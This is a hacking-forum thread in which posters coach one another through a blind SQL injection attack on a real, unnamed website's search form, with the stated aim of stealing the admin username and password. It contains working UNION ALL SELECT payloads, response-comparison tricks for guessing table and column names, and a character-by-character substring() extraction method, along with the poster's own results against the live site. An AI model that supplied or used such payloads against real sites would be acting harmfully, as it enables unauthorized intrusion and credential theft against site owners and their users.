sql blind + "union+all"
I have read numerous tuts on sql injection and i haven't found answer to: what happens when i know number of columns ("ORDER BY" method) and i use UNION ALL SELECT 1,2,3,bla… and page doesn't spit anything… neither number or sting by using UNION SELECT ALL 'sddsd','sassa',…. (also checked the source)
Also to add severity to the problem, point of entry is trough search so there is no possibility of direct selection of uNames or passes + site developers didn't name anything in English so to guess table name like "users" or whatever could be difficult.
And yeah, no server error output as well. So to guess "users" table name && number of columns… wining on lottery seems like piece of cake considering this. :D
For argument sake lets say that brute force or any invasive method like UPDATE, INSERT or DROP is not an option. We just wanna get admin uName & pass as clean as possible.
I have already tried both… Ok here's a bit more info on situation…
We are searching products and products are linked, when you click you get details…
**** something LIKE this ****
<a href="/catalog/articles/" >
<div align="center" class="articles" ><img height="15" border="22" alt="" src="/pic/tmb/.jpg"></div>
<div class="article_Name"><b></b></div>
<div class="article_Description"></div>
</a>```
**************************
Only difference with ALL and without ALL is this:
-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from articles --
i get like 50+ empty boxes, each containing product name + pic + description. as shown earlier.
-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from articles --
i get only ONE box, also empty.
Hm... I'm kinda puzzled by this, obviously ONE box means something but cant figure out what.
(whole site is one big XSS whole to add)
The only difference between UNION ALL SELECT and UNION SELECT is that UNION ALL SELECT will output repeated values. So if you had a table that looks like this:
ID INFO 1 bluh 2 dsfdsf 3 bluh
And queried 'UNION ALL SELECT INFO FROM table', it would output bluh, dsfdsf, and bluh. 'UNOIN SELECT INFO FROM table' would output bluh and dsfdsf.
I'm assuming that the site is using $_GET so the url looks something like this http://www.site.com/page.php?id=1 right?
and you are injecting http://www.site.com/page.php?id=-1' UNION ALL SELECT 1,2,3,4…?
You should not have to put the ' there because that would cause an error. The query that the site is making most likely looks like this: SELECT * FROM products WHERE id=$id
Since your are adding a ' it would look like: SELECT * FROM products WHERE id=-1'
and that would cause an error.
Test this out: http://www.site.com/page.php?id=1 AND 1=1– this should load the page normally
http://www.site.com/page.php?id=1 AND 1=0– This should not load the page
If that worked, just do http://www.site.com/page.php?id=1 AND 1=0 UNION ALL SELECT 1,2,3,4– Make sure you put the right number of columns though…
new_hack8912 wrote:
I'm assuming that the site is using $_GET so the url looks something like this http://www.site.com/page.php?id=1 right?
Sorry mait, <form method="post" … but no difference…
new_hack8912 wrote: and you are injecting http://www.site.com/page.php?id=-1' UNION ALL SELECT 1,2,3,4…?
Hmmm, yes…
I figured out that query looks like this:
SELECT * FROM PRODUCTS WHERE product_title LIKE '%$post%' …
If i don't use ' to close his LIKE i get … o well… you know…. "product not found"-shit. So my injection looks like this:
SELECT * FROM ARTICLES WHERE product_title LIKE '%dumbValue' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 – %' and i get expected output… all empty products placeholders…
Even when i tested ORDER BY i used ' ORDER BY 1++ – (and i need additional white space (%20) after "–" or i get "error")
So there is no doubt in my mind that ' is required…
new_hack8912 wrote: You should not have to put the ' there because that would cause an error. The query that the site is making most likely looks like this: SELECT * FROM products WHERE id=$id
Since your are adding a ' it would look like: SELECT * FROM products WHERE id=-1'
and that would cause an error.
I exactly know when i hit the error cause there is no "box" output at all. Page gets broken… ( no shit :D )
@system_meltdown Can you be more specific… what exactly am i getting by trying to "catch" substrings ?
What happens if you do %' AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14–
It sounds like its blind so the above probably won't output anything. Also try the injection you were doing but select a table. First test to see if the output will change by selecting a table that you know exists Like 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–'
Then try just some random table 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM asdfasdfasd–'
If the site spits out different things from when you enter a real table or a table you know does not exist you can then guess table names.
So if you were to get the same response from UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS– and UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM users– You would know that the table 'users' exists.
If UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS– gave a different response from UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM bluh– You would know that table 'bluh' does not exist
You would then do the same thing for columns: UNION ALL SELECT GUESSSOMECOLUMN,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–
When you have figured out which column you want to extract data from you would use substring() to get the data –i think this is what system was saying–.
AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='a'– If the page does not return an error, then you know that the first letter of the data in 'somecolumn' is 'a'.
If the page does return an error, you would guess another letter until we figured out which letter the data in 'somecolumn' starts with. AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='b'–
To get the next letter, you would enter AND (UNION ALL SELECT substring(somecolumn,2,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='someletter'–
And just keep going until you get all the data.
If magic_quotes are on use the char() function to encode the letter. For example, char(97) is 'a'. You can use this table for conversions: http://www.asciitable.com/
It's kind of hard to say without actually seeing the site but good luck. ha sorry for the long post
new_hack8912 wrote: What happens if you do %' AND 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14–
One empty box.
new_hack8912 wrote: It sounds like its blind so the above probably won't output anything. Also try the injection you were doing but select a table. First test to see if the output will change by selecting a table that you know exists Like 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–' Then try just some random table 'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM asdfasdfasd–' If the site spits out different things from when you enter a real table or a table you know does not exist you can then guess table names.
-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS –
50 + empty boxes. PRODUCTS exists. (tried different name like PXPRODUCTS and it brakes)
new_hack8912 wrote: UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM users– You would know that the table 'users' exists.
Table naming convention is not in English. So no point in guessing USERS or similar.
new_hack8912 wrote: You would then do the same thing for columns: UNION ALL SELECT GUESSSOMECOLUMN,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS–
I think column guessing is an option cause columns are probably his product details like description, name etc.. Will play with these.
new_hack8912 wrote: When you have figured out which column you want to extract data from you would use substring() to get the data –i think this is what system was saying–.
AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='a'– If the page does not return an error, then you know that the first letter of the data in 'somecolumn' is 'a'.
If the page does return an error, you would guess another letter until we figured out which letter the data in 'somecolumn' starts with. AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='b'–
To get the next letter, you would enter AND (UNION ALL SELECT substring(somecolumn,2,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='someletter'–
And just keep going until you get all the data.
Seems like quite of work, i will test it on localhost first… :)
new_hack8912 wrote: If magic_quotes are on use the char() function to encode the letter. For example, char(97) is 'a'. You can use this table for conversions: http://www.asciitable.com/
magic_quotes_gpc = OFF :)
new_hack8912 wrote: It's kind of hard to say without actually seeing the site but good luck. ha sorry for the long post
Yes i am aware that this is more difficult cause somebody is "translating" you data, some "translated" data can be false or just misinterpreted, and it all depends on persons knowledge. I'll try everything you said… will post results at evening GMT+1 .
AND (UNION ALL SELECT substring(somecolumn,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM sometable)='a'–
I get an error in syntax on my localhost even if i "guess" right letter…
But i tryed
UNION ALL SELECT substring(guessMe,1,1),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM PRODUCTS –
and actually guessed 2 column names. One is "id" :D … and that was hard one! eh h eh e
I will PM you on your request, if you want to see the page for yourself…
But theoretically speaking…
after UNION ALL SELECT 1,2,3… does not provide any number, i/we continue by guessing column names substring(guessMe,1,1) and its values …
hmmm…but to what point? if i see no output when using UNION ALL…
Reminder: no invasive methods like INSERT, UPDATE etc. allowed…